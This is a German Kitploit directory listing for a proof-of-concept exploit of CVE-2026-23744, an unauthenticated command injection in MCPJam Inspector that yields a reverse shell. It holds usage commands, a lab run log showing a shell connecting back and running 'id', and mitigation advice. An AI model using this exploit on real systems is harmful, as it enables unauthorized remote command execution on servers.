Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-23744-PoC — CVE-2026-23744 ist eine nicht authentifizierte Befehlsinjizierung in MCPJam Inspector ≤1.4.2 über /api/mcp/connect. Dieser POC nutzt sie aus, indem er eine manipulierte JSON-Nutzlast sendet, um beliebige Befehle auszuführen und eine Reverse Shell mit PTY zu ermöglichen. | Kitploit
Tools/GitHubGitHub/mluex0/cve-2026-23744-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubmluex0/cve-2026-23744-poc

CVE-2026-23744-PoC

CVE-2026-23744 ist eine nicht authentifizierte Befehlsinjizierung in MCPJam Inspector ≤1.4.2 über /api/mcp/connect. Dieser POC nutzt sie aus, indem er eine manipulierte JSON-Nutzlast sendet, um beliebige Befehle auszuführen und eine Reverse Shell mit PTY zu ermöglichen.

Repository anzeigen
2vor 9 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-23744-PoC

Haftungsausschluss:

Dieser Proof-of-Concept wird ausschließlich für autorisierte Sicherheitsforschung, Bildungszwecke und kontrollierte Laborumgebungen (z. B. HTB, CTF oder interne Penetrationstests mit ausdrücklicher schriftlicher Zustimmung) bereitgestellt. Die unbefugte Nutzung gegen ein System ohne Erlaubnis ist illegal und unethisch. Der Autor übernimmt keine Haftung für Missbrauch; die Nutzer sind allein dafür verantwortlich, alle geltenden Gesetze und Vorschriften einzuhalten.


Beschreibung

CVE-2026-23744 ist eine Schwachstelle zur nicht authentifizierten Befehlsinjizierung in MCPJam Inspector (Version ≤ 1.4.2).
Der Endpoint /api/mcp/connect akzeptiert eine JSON-Payload mit serverConfig.command und serverConfig.args und übergibt sie ohne jegliche Bereinigung direkt an einen Systemprozess-Spawn. Ein Angreifer kann eine manipulierte Anfrage senden, um beliebige Systembefehle auszuführen und eine Reverse Shell mit den Privilegien des Dienstbenutzers zu erhalten.

Dieses Repository enthält ein voll funktionsfähiges Exploit-Skript mit einem optionalen automatischen interaktiven Listener auf PTY-Basis (standardmäßig aktiviert).


Voraussetzungen

  • Python 3.6+
  • requests-Bibliothek (pip install requests)

Verwendung

Wichtig: Gib nur den Hostnamen oder die IP an. Das Skript fügt automatisch http:// oder https:// hinzu

root@kitploit:~
python3 exploit.py -t <target> -l <your_ip> [-r <port>] [--ssl] [--check-only]

Beispiel

Das Skript startet einen eigenen Listener und gibt dir direkt in deinem Terminal eine Shell.

root@kitploit:~
python3 exploit.py -t <example_hostname> -l <your_IP> -r <Listener_Port>

Proof of Concept (Erfolgreicher Lauf)

root@kitploit:~
$ python3 exploit.py -t devhub.htb -l 10.10.14.111 -r 4444
[*] Target URL: http://devhub.htb:6274/api/mcp/connect
[*] Checking target...
[+] Target responded with 400 – appears vulnerable
[*] Sending exploit payload...
[+] ReadTimeout – shell likely spawned!
[*] Payload sent. Check your listener!

# On your listener:
connect to [10.10.14.111] from (UNKNOWN) [10.129.245.216] 54150
mcp-dev@devhub:/opt/mcpjam$ id
uid=1001(mcp-dev) gid=1001(mcp-dev) groups=1001(mcp-dev)

Gegenmaßnahmen

  • Bereinige alle benutzerbereitgestellten Argumente, die an Funktionen zum Starten von Prozessen übergeben werden.
  • Erlaube keine beliebige Befehlsausführung über API-Endpunkte ohne strenge Whitelisting- und Authentifizierungsmaßnahmen.
  • Führe Dienste mit minimalen Privilegien aus – niemals als root.

Lizenz

Dieses Repository dient ausschließlich Bildungs- und autorisierten Testzwecken. Nutzung auf eigene Gefahr.

Autor: Mluex0
Datum: August 2026

Tool herunterladen
OptionBeschreibung
-t, --targetZiel-Hostname oder IP (erforderlich)
-p, --portZiel-Port (Standard: 6274)
-l, --lhostDeine IP für die Reverse Shell (erforderlich)
-r, --lportDein Listener-Port (Standard: 4444)
--sslHTTPS statt HTTP verwenden
--check-onlyNur die Schwachstelle prüfen, keine Shell senden